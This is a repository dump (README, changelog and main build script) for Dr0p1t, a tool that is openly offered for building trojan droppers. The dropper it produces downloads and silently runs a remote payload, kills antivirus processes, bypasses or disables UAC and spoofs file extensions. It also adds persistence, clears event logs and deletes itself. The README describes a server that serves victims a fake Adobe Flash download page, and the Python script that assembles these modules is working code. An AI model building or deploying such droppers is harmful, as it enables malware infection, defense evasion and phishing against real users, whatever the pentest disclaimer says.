README.md
# Dr0p1t-Framework ![Stage](https://img.shields.io/badge/Release-STABLE-brightgreen.svg) [![Python 3.5](https://img.shields.io/badge/Python-3.5-yellow.svg)](http://www.python.org/download/) [![Python 2.7](https://img.shields.io/badge/Python-2.7-yellow.svg)](http://www.python.org/download/) ![Build Status](https://img.shields.io/badge/Version-1.3.2.1-red.svg)

Have you ever heard about trojan droppers ?
In short dropper is type of trojans that downloads other malwares and Dr0p1t gives you the chance to create a stealthy dropper that bypass most AVs and have a lot of tricks ( Trust me :D ) ;)

# Features
**+ Generated executable properties:**
- The executable size is smaller compared to other droppers generated the same way.
- Download executable on target system and execute it silently..
- Self destruct function so that the dropper will kill and delete itself after finishing it work
- Escape disk forensics by making all the files dropper create and dropper also cleans its content before deletion
- Clear event log after finishing.

**+ Framework properties:**
- Works with Windows, Linux and now have OSX support ( Thanks to @sm4sh3r )
- Dr0p1t-Server feature (beta) so now you can work from browser [See how to work with Dr0p1t-Server](#work-with-dr0p1t-server)
- Dr0p1t-Server have a scam option (beta) [See how to work with Dr0p1t-Server](#work-with-dr0p1t-server)

**+ Modules:**
- Find and kill antivirus before running the malware.
- The ability to disable UAC.
- The ability to run your malware as admin.
- Full spoof by spoofing the file icon and extension to any thing you want.
- ZIP files support so now you can compress your executable to zip file before uploading.
- Running a custom ( batch|powershell|vbs ) file you have chosen before running the executable
- In running powershell scripts it can bypass execution policy
- Using UPX to compress the dropper after creating it

**+Persistence modules:**
- Adding executable after downloading it to startup.
- Adding executable after downloading it to task scheduler ( UAC not matters ).
- Adding your file to powershell user profile so your file will be downloaded and ran every time powershell.exe run if it doesn't exist.

# Screenshots
## On Windows
<img src="https://github.com/D4Vinci/Dr0p1t-Framework/blob/master/Screenshots/Windows/WinTest-1.JPG" width="100%"></img>

[See more](https://github.com/D4Vinci/Dr0p1t-Framework/blob/master/Screenshots/Windows)

## On Linux (Kali linux)
<img src="https://github.com/D4Vinci/Dr0p1t-Framework/blob/master/Screenshots/Linux/LinuxTest-1.png" width="100%"></img>

[See more](https://github.com/D4Vinci/Dr0p1t-Framework/blob/master/Screenshots/Linux)

## On OSX
Still not fully tested! Need some contributors and testers :smile:

### Help menu
```
Usage: Dr0p1t.py Malware_Url [Options]

options:
-h, --help      show this help message and exit
-s              Add your malware to startup (Persistence)
-t              Add your malware to task scheduler (Persistence)
-a              Add your link to powershell user profile (Persistence)
-k              Kill antivirus process before running your malware.
-b              Run this batch script before running your malware. Check scripts folder
-p              Run this powershell script before running your malware. Check scripts folder
-v              Run this vbs script before running your malware. Check scripts folder
--runas         Bypass UAC and run your malware as admin
--spoof         Spoof the final file to an extension you choose.
--zip           Tell Dr0p1t that the malware in the link is compressed as zip
--upx           Use UPX to compress the final file.
--nouac         Try to disable UAC on victim device
-i              Use icon to the final file. Check icons folder.
--noclearevent  Tell the framework to not clear the event logs on target machine after finish.
--nocompile     Tell the framework to not compile the final file.
--only32        Download your malware for 32 bit devices only
--only64        Download your malware for 64 bit devices only
-q              Stay quite ( no banner )
-u              Check for updates
-nd             Display less output information
```
### Examples
```
./Dr0p1t.py Malware_Url [Options]
./Dr0p1t.py https://test.com/backdoor.exe -s -t -a -k --runas --upx
./Dr0p1t.py https://test.com/backdoor.exe -k -b block_online_scan.bat --only32
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k -p Enable_PSRemoting.ps1 --runas
./Dr0p1t.py https://test.com/backdoor.zip -t -k --nouac -i flash.ico --spoof pdf --zip
```
# Prerequisites
- Python 2 or Python 3.

>The recommended version for Python 2 is 2.7.x , the recommended version for Python 3 is 3.5.x and don't use 3.6 because it's not supported yet by PyInstaller

### Needed dependencies for Linux
- apt
- Others will be installed from install.sh file

>Note : You must have root access

### Needed dependencies for windows
- pip
- Modules in windows_requirements.txt

# Installation
>There's a list here for all official videos for installing and using Dr0p1t [Playlist](https://www.youtube.com/playlist?list=PLn3wMo250kMb1w7W7sUcQi6smA77V2men)
- On Linux
```
git clone https://github.com/D4Vinci/Dr0p1t-Framework.git
chmod 777 -R Dr0p1t-Framework
cd Dr0p1t-Framework
sudo chmod +x install.sh
./install.sh
python Dr0p1t.py
```

- On Windows (After downloading ZIP and upzip it)
```
cd Dr0p1t-Framework-master
python -m pip install -r windows_requirements.txt
python Dr0p1t.py
```
>Note : in python 2.7 you don't have pip so install it first from get-pip.py script [Google it]

### Tested on:

- Kali Linux Rolling
- Ubuntu 14.04-16.04 LTS
- Windows 10/8.1/8

# Work with Dr0p1t-Server
>Note : Server is still in beta version and it have a lot of features to add and also a better design [ Need a designer to contribute :D ]

## Prerequisites
- Stable internet connection.
- Port 5000 not used and firewall configured to not block connection from it

## Installation & run server
On Linux and Windows it's the same after installing Dr0p1t by doing the steps mentioned above, install modules in server_requirements.txt by using pip like :

```
python -m pip install -r server_requirements.txt
```
Now let's run our server script :

```
python Dr0p1t_Server.py
```
After running the server script, it will start to listen to all the connection coming to port 5000 using flask.

Now to use the server from your device open in browser either 127.0.0.1:5000 or [Your IP]:5000.

To open it from other devices in LAN open [Your Local IP]:5000 and for other devices in WAN open [Your Global IP]:5000 but make sure first that you configured you router to forward port 5000 connection to you.

After opening the serve page you will see a simple website with a simple design asking you for data needed [See server screenshots](#server-screenshots)

Then submit the data then it will be verified through some processes then the exe file will be generated and you will be redirected to page telling you the scam link.

After entering the link you will see a scam to download the dropper which it by default Adobe flash download page.
To replace the scam with yours replace the file "Scam.html" content with yours but remember the variables ( Don't remove it ).

## Server screenshots
<img src="https://github.com/D4Vinci/Dr0p1t-Framework/blob/master/Screenshots/Linux/LinuxServerTest-1.png" width="100%"></img>
<img src="https://github.com/D4Vinci/Dr0p1t-Framework/blob/master/Screenshots/Linux/LinuxServerTest-2.png" width="100%"></img>
<img src="https://github.com/D4Vinci/Dr0p1t-Framework/blob/master/Screenshots/Linux/LinuxServerTest-3.png" width="100%"></img>
<img src="https://github.com/D4Vinci/Dr0p1t-Framework/blob/master/Screenshots/Linux/LinuxServerTest-4.png" width="100%"></img>

[See more for Windows](https://github.com/D4Vinci/Dr0p1t-Framework/blob/master/Screenshots/Windows)
[See more for Linux](https://github.com/D4Vinci/Dr0p1t-Framework/blob/master/Screenshots/Linux)

# No distribute scan ( Please don't scan with virus total:3 )
<img src="https://github.com/D4Vinci/Dr0p1t-Framework/blob/master/Screenshots/nodistribute_scan.png" width="100%"></img>

## Todo [Check out this link](https://github.com/D4Vinci/Dr0p1t-Framework/projects/1)

## Contact
- [Twitter](https://twitter.com/D4Vinci1)

## Disclaimer
Dr0p1t Framework not responsible for misuse and for illegal purposes. Use it only for Pentest or educational purpose !!!

Copying a code from this framework or using it in another tool is accepted as you mention where you get it from :smile:

> Pull requests are always welcomed :D


CHANGELOG.md
# Version 1.3.2.1
# A small fix to the download function
- Fixed the permission issue that made the dropper not working.

# Version 1.3.2
# Another small update to fix things
- Fixed the path error in the new download function
- Improved the download function so it first store the file in the memory till the downloading complete then saves it in a file and hides it (Useful when download  big files)

# Version 1.3.1
# A small update to fix things
- Fixed Add to startup function ( Sorry forgot to add that function ! )
- Improved download function so now it can download big files.
- Fixed the SyntaxError in RunAs function.

# Version 1.3
## A huge update to fix and make improvements like :
- [Feature] Adding spoof extension feature so now you can change the file extension and icon to make it full spoof :smile:
- [Improve] Added OSX support ( Thanks to @sm4sh3r )
- [Improve] Now there will be debug file when happen error in compiling with Pyinstaller.
- [BUG fix] Full rewriting the framework to improve the executions methods and fix all the errors
- [BUG fix] Bypassed the error in the Pyinstaller **"FATAL ERROR"** with replacing subprocess Pipes with files :smile:
- [Stealth] Escaping disk forensics by making all the files dropper create and dropper also cleans its content before deletion.
- [Feature] Adds ZIP files support so now you can compress your executable to zip file before uploading
- [Feature] Added Dr0p1t-Server feature (beta) so now you can work from browser [See how to work with Dr0p1t-Server](https://github.com/D4Vinci/Dr0p1t-Framework#work-with-dr0p1t-server)
- [Feature] Added Scamming feature (beta) to Dr0p1t-Server [See how to edit Dr0p1t-Server scam ](https://github.com/D4Vinci/Dr0p1t-Framework#work-with-dr0p1t-server)
- [Stealth] Clear event log after finishing
- [Improve] Added install.sh to make installing on Linux more easy
- [Improve] Persistence modules are now improved and recoded to work much better.
- [Feature] Added new a new-hard-to-detect persistence module ( Adding your file to powershell user profile so your file will be downloaded and ran every time powershell.exe run if it doesn't exist).
- [Feature] Added a new module to bypass UAC and run your malware as admin


# Version 1.2
## A huge update to fix some things like add-cross compile problem and some improvements :
- Pyinstaller compiling in Linux using wine
- Pyinstaller compiling in Windows will not use UPX and that will fix the compiling in windows
- Added the ability to disable and bypass UAC
- Updated the antivirus list in the antivirus killer
- Added SelfDestruct function so that the dropper will kill and delete itself after finishing it work :smile:
- Full framework rewrite and recheck to fix errors, typos and replacing some libraries to make the size of the final file smaller
- Started working in some SE tricks to fool the user and there's a lot of good options in the way ;) **Stay Tuned**

# Version 1.1 ( Stable )
## Now it can be called a stable version and done some things like :
- Added python 2 support ( Now the script can run on python2 or python3 )
- Added option to not compile the script to exe ( if you want to compile dr0p3r by yourself or any other reason )
- Some modifications for sandbox bypass
- Made folder for icons and put some icons in it ( default icons )
- Some improvements and fixes.

# Version 1.0.1 (Beta )
## A small update to fix and improve some things like :
- Considering the size I replaced importing the whole module with importing what I want from the module .
- Improving the task persistence module and bypassing UAC error by creating two tasks with a different names and paths ( one of them runs every hour and the other runs every day ) .
- Improved Run(BAT|PS1|VBS) module to hide the script before running it .
- Improved or fixed the startup persistence module .
- Some improvements and fixes.

# Version 1.0 (Alpha)
### The first release :smile:


Dr0p1t.py
#!/usr/bin/python3
#Written by: Karim shoair - D4Vinci ( Dr0p1t-Framework )
from core.banners import random_banner as banner
from core.color import *
from core.Phishing import *
from core import color,updater
import argparse ,os ,textwrap ,sys ,subprocess, shutil ,random

parser = argparse.ArgumentParser(
usage=argparse.SUPPRESS,
prog='Dr0p1t.py',
formatter_class=argparse.RawDescriptionHelpFormatter,
description=textwrap.dedent( warn() ),
epilog="""\nExamples :
./Dr0p1t.py Malware_Url [Options]
./Dr0p1t.py https://test.com/backdoor.exe -s -t -a -k --runas --upx
./Dr0p1t.py https://test.com/backdoor.exe -k -b block_online_scan.bat --only32
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k -p Enable_PSRemoting.ps1 --runas
./Dr0p1t.py https://test.com/backdoor.zip -t -k --nouac -i flash.ico --spoof pdf --zip

Note : Scripts like (bat\\ps1\\vbs) can only loaded from the scripts folder.
        So if you wanna use custom scripts made by yourself,put it in the scripts folder.
"""
)
parser.add_argument("url", metavar='Malware_url',nargs="?", help="Url to your malware")
parser.add_argument("-s", action='store_true', help="Add your malware to startup (Persistence)")
parser.add_argument("-t", action='store_true', help="Add your malware to task scheduler (Persistence)")
parser.add_argument("-a", action='store_true', help="Add your link to powershell user profile (Persistence)")
parser.add_argument("-k", action='store_true', help="Kill antivirus process before running your malware.")
parser.add_argument("-b", help="Run this batch script before running your malware. Check scripts folder")
parser.add_argument("-p", help="Run this powershell script before running your malware. Check scripts folder")
parser.add_argument("-v", help="Run this vbs script before running your malware. Check scripts folder")
parser.add_argument("--runas",action='store_true', help="Bypass UAC and run your malware as admin")
parser.add_argument("--spoof", help="Spoof the final file to an extension you choose.")
parser.add_argument("--zip",action='store_true', help="Tell Dr0p1t that the malware in the link is compressed as zip")
parser.add_argument("--upx",action='store_true', help="Use UPX to compress the final file.")
parser.add_argument("--nouac",action='store_true', help="Try to disable UAC on victim device")
parser.add_argument("-i", help="Use icon to the final file. Check icons folder.")
parser.add_argument("--noclearevent",action='store_true', help="Tell the framework to not clear the event logs on target machine after finish.")
parser.add_argument("--nocompile",action='store_true', help="Tell the framework to not compile the final file.")
parser.add_argument("--only32",action='store_true', help="Download your malware for 32 bit devices only")
parser.add_argument("--only64",action='store_true', help="Download your malware for 64 bit devices only")
parser.add_argument("-q", action='store_true', help="Stay quite ( no banner )")
parser.add_argument("-u", action='store_true', help="Check for updates")
parser.add_argument("-nd", action='store_true', help="Display less output information")
args = parser.parse_args()

def PyInstaller():
    if os.name=="nt":
        installer = "pyinstaller"
    else:
        if sys.platform == "darwin": # On osx, the default .wine directory is located on $HOME/.wine/
            installer = "wine " + os.environ['HOME'] + "/.wine/drive_c/Python27/python.exe " + os.environ['HOME'] + "/.wine/drive_c/Python27/Scripts/pyinstaller-script.py"
        else: #ToDo: find all defaults location for .wine , or request it directely to the user if not found.
            installer = "wine /root/.wine/drive_c/Python27/python.exe /root/.wine/drive_c/Python27/Scripts/pyinstaller-script.py"

    p = subprocess.Popen( installer + " -h",shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE )
    x = p.stdout.read().decode()
    if x == "":
        return False
    elif x != "":
        return True

def get_code(f):
    code = open( f,"r" ).read()
    return "\n"+code.split("#Start")[1]

def make_copy( old,new ):
    old_file = open( old,"rb" )
    new_file = open( new,"wb" )
    old_data = old_file.read()
    new_file.write( old_data )
    old_file.close()
    new_file.close()

def random_name():
    return "Dr0pp1r" + str(random.randint(0,100))

def clear():
    if os.name=="nt":
        x=os.system("cls")
    else:
        x=os.system("clear")

def prepare_folder(folder):
    x  = shutil.rmtree(folder, ignore_errors=True)
    xx = os.mkdir(folder)
    xfx = open( os.path.join(folder,"README.md"),"w")
    xfx.write("# Don't mess with this folder or delete it\n")
    xfx.close()

def get_executable():
    return os.listdir("dist")[0]

def main():
    prepare_folder("temp")
    prepare_folder("output")
    clear()
    if args.u:
        updater.check()
        sys.exit(0)

    if not args.u:
        if not args.url:
            print( parser.print_help() )
            x=sys.exit(0)

    if not args.q:
        banner()

    if os.name=="nt":
        installer = "pyinstaller"
        exe = ""
    else:
        if sys.platform == "darwin": # On osx, the default .wine directory is located on $HOME/.wine/
            installer = "wine " + os.environ['HOME'] + "/.wine/drive_c/Python27/python.exe " + os.environ['HOME'] + "/.wine/drive_c/Python27/Scripts/pyinstaller-script.py"
        else: # TODO: find all defaults location for .wine , or request it directely to the user if not found.
            installer = "wine /root/.wine/drive_c/Python27/python.exe /root/.wine/drive_c/Python27/Scripts/pyinstaller-script.py"
        exe = "wine "

    url      = args.url
    p        = "resources"
    fullp    = os.getcwd()
    command  = installer +" --noconsole -F --noupx {} "
    bat_path = ["scripts","bat"]
    ps1_path = ["scripts","powershell"]
    vbs_path = ["scripts","vbs"]
    f        = ""

    print_status(args)
    colored_print( " [*] Creating DR0P3R..","g" )

    f += "#!/usr/bin/python\n"
    f += "# -*- coding: iso-8859-15 -*-\n"
    f += 'import subprocess\n'

    f += get_code( os.path.join(p,"pre_run.py") )+"\n"
    #this functions for :
    #get_output(cmd): to get output of command without using pipe to escape the fatal error after compiling !!

    if args.k:
        if not args.nd:
            colored_print( " [*] Adding kill antivirus function..","g" )
        f += get_code( os.path.join(p,"killav.py") )+"\n"

    if sys.version_info[0]==3:
    	f += '\nfrom urllib.request import urlopen'
    elif sys.version_info[0]==2:
    	f += '\nfrom urllib import urlopen'

    if "http" not in url:
        url = "http://"+url

    if args.only32:
        if args.zip:
            f += get_code( os.path.join(p,"dropper.py") ).replace("##~Import-Here~##","import zipfile").split("#Someshit")[0]+"\n"
            f += '\nfire_things_up("{}","32",True)\n'.format( url )
        else:
            f += get_code( os.path.join(p,"dropper.py") ).split("#Someshit")[0]
            f += '\nfire_things_up("{}","32")\n'.format( url )

    elif args.only64:
        if args.zip:
            f += get_code( os.path.join(p,"dropper.py") ).replace("##~Import-Here~##","import zipfile").split("#Someshit")[0]+"\n"
            f += '\nfire_things_up("{}","64",True)\n'.format( url )
        else:
            f += get_code( os.path.join(p,"dropper.py") ).split("#Someshit")[0]
            f += '\nfire_things_up("{}","64")\n'.format( url )

    elif not args.only32 or not args.only64:
        if args.zip:
            f += get_code( os.path.join(p,"dropper.py") ).replace("##~Import-Here~##","import zipfile").split("#Someshit")[0]+"\n"
            f += '\nfire_things_up("{}",False,True)\n'.format( url )
        else:
            f += get_code( os.path.join(p,"dropper.py") ).split("#Someshit")[0]
            f += '\nfire_things_up("{}")\n'.format( url )

    if args.runas:
        f += get_code( os.path.join(p,"runas.py") )
    else:
        f += get_code( os.path.join(p,"dropper.py") ).split("#Someshit")[1]

    if args.s:
        if not args.nd:
            colored_print( " [*] Adding startup function..","g" )
        if "File = 'library.exe'" not in f:
            f+="\nFile = 'library.exe'"
        f += get_code( os.path.join(p,"add2startup.py") )+"\n"

    if args.t:
        if not args.nd:
            colored_print( " [*] Adding task function..","g" )
        if "File = 'library.exe'" not in f:
            f+="\nFile = 'library.exe'"
        f += get_code( os.path.join(p,"add2task.py") )+"\n"

    if args.a:
        if not args.nd:
            colored_print( " [*] Adding add2profile function..","g" )
        if "File = 'library.exe'" not in f:
            f+="\nFile = 'library.exe'\n"
        f += "\nlink='{}'".format(url)
        f += get_code( os.path.join(p,"add2profile.py") )+"\n"

    if args.b:
        try :
            if not args.nd:
                colored_print( " [*] Adding runbat function..","g" )
            bat_path.append(args.b)
            ff = open( os.path.join(*bat_path ) ).read()
            f += "\nBat_Script_Data = '''{}'''".format( ff )
            f += get_code( os.path.join(p,"Runbat.py") )+"\n"
        except:
            colored_print( " [!] Error in reading bat file,are you sure it's in scripts folder ?","r" )

    if args.p:
        try :
            if not args.nd:
                colored_print( " [*] Adding runps1 function..","g" )
            ps1_path.append(args.p)
            ff = open( os.path.join(*ps1_path ) ).read()
            f += "\nPs1_Script_Data = '''{}'''".format( ff )
            f += get_code( os.path.join(p,"Runps1.py") )+"\n"
        except :
            colored_print( " [!] Error in reading ps1 file,are you sure it's in scripts folder ?","r" )

    if args.v:
        try :
            if not args.nd:
                colored_print( " [*] Adding runvbs function..","g" )
            vbs_path.append(args.v)
            ff = open( os.path.join(*vbs_path ) ).read()
            f += "\nVbs_Script_Data = '''{}'''".format( ff )
            f += get_code( os.path.join(p,"Runvbs.py") )+"\n"
        except :
            colored_print( " [!] Error in reading vbs file,are you sure it's in scripts folder ?","r" )

    if args.nouac:
        if not args.nd:
            colored_print( " [*] Adding disable UAC function..","g" )
        f += get_code( os.path.join(p,"Disable_UAC.py") )+"\n"

    colored_print( " [*] Adding self destruct function..","g" )
    f += get_code( os.path.join(p,"SelfDestruct.py") )+"\n"

    if not args.noclearevent:
        colored_print( " [*] Adding clear eventlog function..","g" )
        f += get_code( os.path.join(p,"Clearev.py") )+"\n"

    colored_print( " [*] Saving the final file..","g" )
    file_name = random_name()
    f+="\nx = subprocess.Popen( 'del out >> NUL',creationflags=subprocess.CREATE_NEW_CONSOLE, shell=True)"

    os.chdir("temp")
    fo = open( file_name+".py","w" )
    fo.write(f)
    fo.close()

    if not args.nocompile:
        if PyInstaller():
            colored_print( " [*] Compiling the final file to exe..","g" )
            if args.i:
                if os.path.isfile( os.path.join(fullp,"icons",args.i) ):
                    if not args.nd:
                        colored_print( " [*] Adding icon to the final file..","g" )
                    command += "--icon=" + os.path.join(fullp,"icons",args.i)
                else:
                    colored_print( " [!] Error in icon file,are you sure it's in icons folder ?","r" )

            p     = subprocess.Popen( command.format(file_name+".py"), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
            (output, err) = p.communicate()
            debug = output.decode() + "\n" + err.decode()
            pw    = p.wait()
            if "Traceback" in debug:
                f=open("debug.txt","w")
                f.write(debug)
                f.close()
                colored_print( " [!] Error in compiling file [ See debug.txt file in temp folder ! ]","r" )
                sys.exit(0)

            file_name = get_executable()

            if args.upx:
                if not args.nd:
                    colored_print( " [*] Compressing the final file..","g" )
                x = subprocess.Popen(exe + os.path.join("utils","upx.exe") +" -9 "+os.path.join("output",file_name) ,shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE )

            os.chdir("..")
            make_copy( os.path.join("temp","dist",file_name),os.path.join("output",file_name) )

            if args.spoof:
                if not args.nd:
                    colored_print( " [*] Spoofing the final file extension..","g" )
                if Spoof_extension(os.path.join("output",file_name),args.spoof):
                    colored_print( " [*] File extension spoof complate !","g" )
                else:
                    colored_print( " [!] File extension spoof failed !","r" )

        else:
            colored_print( " [!] PyInstaller not installed : Can't compile file to exe..","r" )

    elif args.nocompile:
        file_name = file_name+".py"
        os.chdir("..")
        blah = os.rename( os.path.join( "temp",file_name ),os.path.join( "output",file_name ) )

    colored_print( " [*] Finished and saved our Dr0pp3r as "+file_name+" in output folder ( happy hunting )","m" )

if __name__ == '__main__':
    main()
